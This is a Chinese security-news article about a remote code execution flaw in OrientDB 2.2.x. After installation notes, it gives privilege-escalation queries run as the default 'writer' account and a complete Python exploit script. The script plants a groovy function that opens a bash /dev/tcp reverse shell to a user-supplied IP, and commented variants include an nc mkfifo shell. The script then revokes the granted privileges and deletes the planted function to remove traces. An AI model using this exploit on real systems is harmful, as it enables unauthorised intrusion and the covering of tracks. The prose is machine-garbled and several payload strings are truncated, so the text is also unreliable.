频道栏目
首页 > 资讯 > 系统安全 > 正文

Oreint DB远程代码可执行破绽漏洞bug曝光

17-09-25        来源:[db:作者]  
收藏   我要投稿

0×01 对付orient db数据库
OrientDB是一个开源NoSQL数据库管理系统平台。 NoSQL数据库供给了一种用于存储和检索援用除表式数据以外的数据(比方文档数据或图形数据)的NO干系或非干系数据的机制。 NoSQL数据库越来越多地用于大数据和及时Web应用程式。 NoSQL系统平台偶然也被称为“Not Only SQL”,以夸大它们能够支撑相似SQL的查问说话。

OrientDB也属于NoSQL系列。 OrientDB是第二代分布式数据库,具备机动性的文档在一个产物与Apache 2许可证的凋谢源代码。 在OrientDB以前市场上有几个NoSQL数据库,此中一个是MongoDB。
0×01 orient db 数据库的根基知识
步调1 – 下载OrientDB二进制设置文件
下载地点:http://orientdb.com/download社区版和企业版都能够在任何完成Java虚构机(JVM)的操纵系统平台上运转。 OrientDB必要1.7或更高版本的Java。
步调2 – 解压并装置OrientDB
如下是为分歧操纵系统平台提取和装置OrientDB的进程。在Linux中将orientdb-community-2.1.9.tar.gz文件解压,能够应用如下敕令提取tarred文件。
$ tar –zxvf orientdb-community-2.1.9.tar.gz
应用如下敕令将一切OrientDB库文件从orientdbcommunity-2.1.9挪动到/opt/orientdb/目次。 这里要用sudo
$ sudo mv orientdb-community-2.1.9 /opt/orientdb
应用如下敕令注册orientdb敕令和Orient办事器。
$ export ORIENTDB_HoME = /opt/orientdb$ export PATH = $PATH:$ORIENTDB_HOME/bin
在Windows中将orientdb-community-2.1.9.zip文件解压,将提掏出的文件夹挪动到C:\目次。应用如下给定值创立两个情况变量ORIENTDB_HOME和PATH变量。
ORIENT_HOME = C:orientdb-community-2.1.9
PATH = C:orientdb-community-2.1.9in
步调3 – 设置装备摆设OrientDB办事器作为办事
这里就说下linux的~OrientDB供给了一个名为orientdb.sh的剧本文件,以作为保卫程式运转数据库。在OrientDB装置目次的$ORIENTDB_HOME/bin/orientdb.sh的bin目次中能够找到它。在运转剧本文件以前,编纂orientdb.sh文件以界说两个变量。一个是ORIENTDB_DIR,它界说了装置目次/opt/orientdb的门路,第二个是ORIENTDB_USER,它界说了要运转OrientDB的用户名,如下所示。
ORIENTDB_DIR = "/opt/orientdb"
ORIENTDB_USER = ""
应用如下敕令将orientdb.sh文件复制到/etc/init.d/目次中以初始化和运转剧本。
$ sudo cp $ORIENTDB_HOME/bin/orientdb.sh /etc/init.d/orientdb
应用如下敕令将console.sh文件从OrientDB装置目次$ ORIENTDB_HOME / bin复制到系统平台bin目次(即/ usr / bin)以拜访Orient DB的控制台。
$ sudo cp $ ORIENTDB_HOME/bin/console.sh /usr/bin/orientdb
应用上面的敕令来启动ORIENTDB数据库办事器作为办事。在这里,你必需供给你在orientdb.sh文件说起启动办事器的响应用户的暗码。$ service orientdb start应用如下敕令晓得哪一个PID的OrientDB办事器保卫程式正在运转。$ service orientdb status应用如下敕令结束OrientDB办事器保卫程式。$ service orientdb stop
0×02 漏洞破绽bug阐发
1、OrientDB应用RBAC模子结束认证计划。默许情况下,OrientDB有3个脚色:admin, writer and reader。它们的功效与与用户称号所饰演的脚色雷同。对付在办事器上创立的每一个数据库,默许情况下会分派3个用户。
2、用户的权限分派如下:
admin : 拜访数据库上的一切功效,没有任何限定reader: 只读用户。读者能够查问数据库中的任何记载,但不能改动或删除它,也不能拜访外部信息,比方用户和脚色自己的信息。writer: 与reader雷同,但它也能够创立,更新和删除记载。
3、漏洞破绽bug发生道理
管理员经由过程ORole布局处置用户和他们脚色,OrientDB必要oRole读取权限,以容许用户表现用户权限,并使与oRole权限相联系关系的其余查问。
从版本2.2.x及以上版本,只需oRole被查问,fetchplan和order by语句,则不必要此权限请求,并将信息前往给非特权用户。
因为Orient db启用了这些功效 where、fetchplan、order by,招致了OrientDB具备一个能够履行惯例的功效,而且这个groovy封装器没有沙箱结束掩护招致了系统平台功效被拜访,招致咱们能够运任何敕令。
0×03 漏洞破绽bug复现进程
1、起首先肯定版本号,版本号的肯定可由前往头肯定

2、接着咱们拜访 http://Taarget:2480/listDatabases 获得数据库称号,他会前往为一个json列表

3、用writer的身份测验考试Http根基认证,看其能否对数据库可写。假如可写,那末则漏洞破绽bug存在。
检测三部门的权限能否能获得晋升:1)database.class.ouser
检测能否能够作为特权账户操纵数据库
2)database.function
能否启用功效操纵
3)database.function
能否有系统平台的拜访权限
验证办法如下:
payload:http://Target:2480/command/database_name/sql/-/20?format=rid,type,version,class,graph
以POST的办法哀求如下数据:
GRANT execute ON database.class.ouser TO writer
GRANT execute ON database.function TO writer
GRANT execute ON database.systemclusters TO writer
假如胜利履行则能够应用。
上面给出exp:
{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"' + func_name + '","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/' + reverse_ip + '/6666 0>&1\';File file = new File(\"hello.sh\");file.delete();file    ,"parameters":null}

{C}在目标用bash反弹,当地你能够用nc监听,运转如下敕令:netcat -lp 6666

末了给出PoC:
#! /usr/bin/env python
#-- coding: utf-8 --
# OrientDB
import sys
import requests
import json
import string
import random
target = sys.argv[1]
try:
    port = sys.argv[2] if sys.argv[2] else 2480
except:
    port = 2480
url = "http://%s:%s/command/GratefulDeadConcerts/sql/-/20?format=rid,type,version,class,graph"%(target,port)
def random_function_name(size=5, chars=string.asciilowercase + string.digits):
    return ''.join(random.choice(chars) for  in range(size))
def enum_databases(target,port="2480"):
    base_url = "http://%s:%s/listDatabases"%(target,port)
    req = requests.get(base_url)
    if req.status_code == 200:
        #print "[+] Database Enumeration successful"
        database = req.json()['databases']
        return database
    return False
def check_version(target,port="2480"):
    base_url = "http://%s:%s/listDatabases"%(target,port)
    req = requests.get(base_url)
    if req.status_code == 200:
        headers = req.headers['server']
        #print headers
        if "2.2" in headers or "3." in headers:
            return True
    return False
def run_queries(permission,db,content=""):
    databases = enum_databases(target)
    url = "http://%s:%s/command/%s/sql/-/20?format=rid,type,version,class,graph"%(target,port,databases[0])
    priv_enable = ["create","read","update","execute","delete"]
    #query = "GRANT create ON database.class.ouser TO writer"
    for priv in priv_enable:
        if permission == "GRANT":
            query = "GRANT %s ON %s TO writer"%(priv,db)
        else:
            query = "REVOKE %s ON %s FROM writer"%(priv,db)
        req = requests.post(url,data=query,auth=('writer','writer'))
        if req.status_code == 200:
            pass
        else:
            if priv == "execute":
                return True
            return False
    print "[+] %s"%(content)
    return True
def priv_escalation(target,port="2480"):
    print "[+] Checking OrientDB Database version is greater than 2.2"
    if check_version(target,port):
        priv1 = run_queries("GRANT","database.class.ouser","Privilege Escalation done checking enabling operations on database.function")
        priv2 = run_queries("GRANT","database.function","Enabled functional operations on database.function")
        priv3 = run_queries("GRANT","database.systemclusters","Enabling access to system clusters")
        if priv1 and priv2 and priv3:
            return True
    return False
def exploit(target,port="2480"):
    #query = '"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"most","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file

 

    #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"ost","language":"groovy","code":"def command = 'whoami';File file = new File(\"hello.sh\");file.delete();file
    func_name = random_function_name()
    print func_name
    databases = enum_databases(target)
    reverse_ip = raw_input('Enter the ip to connect back: ')
    query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/'+reverse_ip+'/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file
    #query = '{"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":null,"name":"'+func_name+'","language":"groovy","code":"def command = \'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 0.0.0.0 8081 >/tmp/f\' \u000a File file = new File(\"hello.sh\")\u000a     file.delete()       \u000a     file
    #query = {"@class":"ofunction","@version":0,"@rid":"#-1:-1","idempotent":None,"name":"lllasd","language":"groovy","code":"def command = \'bash -i >& /dev/tcp/0.0.0.0/8081 0>&1\';File file = new File(\"hello.sh\");file.delete();file
    req = requests.post("http://%s:%s/document/%s/-1:-1"%(target,port,databases[0]),data=query,auth=('writer','writer'))
    if req.status_code == 201:
        #print req.status_code
        #print req.json()
        func_id = req.json()['@rid'].strip("#")
        #print func_id
        print "[+] Exploitation successful, get ready for your shell.Executing %s"%(func_name)
        req = requests.post("http://%s:%s/function/%s/%s"%(target,port,databases[0],func_name),auth=('writer','writer'))
        #print req.status_code
        #print req.text
        if req.status_code == 200:
            print "[+] Open netcat at port 8081.."
        else:
            print "[+] Exploitation failed at last step, try running the script again."
            print req.status_code
            print req.text
        #print "[+] Deleting traces.."
        req = requests.delete("http://%s:%s/document/%s/%s"%(target,port,databases[0],func_id),auth=('writer','writer'))
        priv1 = run_queries("REVOKE","database.class.ouser","Cleaning Up..database.class.ouser")
        priv2 = run_queries("REVOKE","database.function","Cleaning Up..database.function")
        priv3 = run_queries("REVOKE","database.systemclusters","Cleaning Up..database.systemclusters")
        #print req.status_code
        #print req.text
def main():
    target = sys.argv[1]
    #port = sys.argv[1] if sys.argv[1] else 2480
    try:
        port = sys.argv[2] if sys.argv[2] else 2480
        #print port
    except:
        port = 2480
    if priv_escalation(target,port):
        exploit(target,port)
    else:
        print "[+] Target not vulnerable"
main()
相关TAG标签
上一篇:2017年9月22日被黑网站曝光
下一篇:码农福音!CSAIL开发代码移植系统,CTRL+C/V编程不再是梦
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站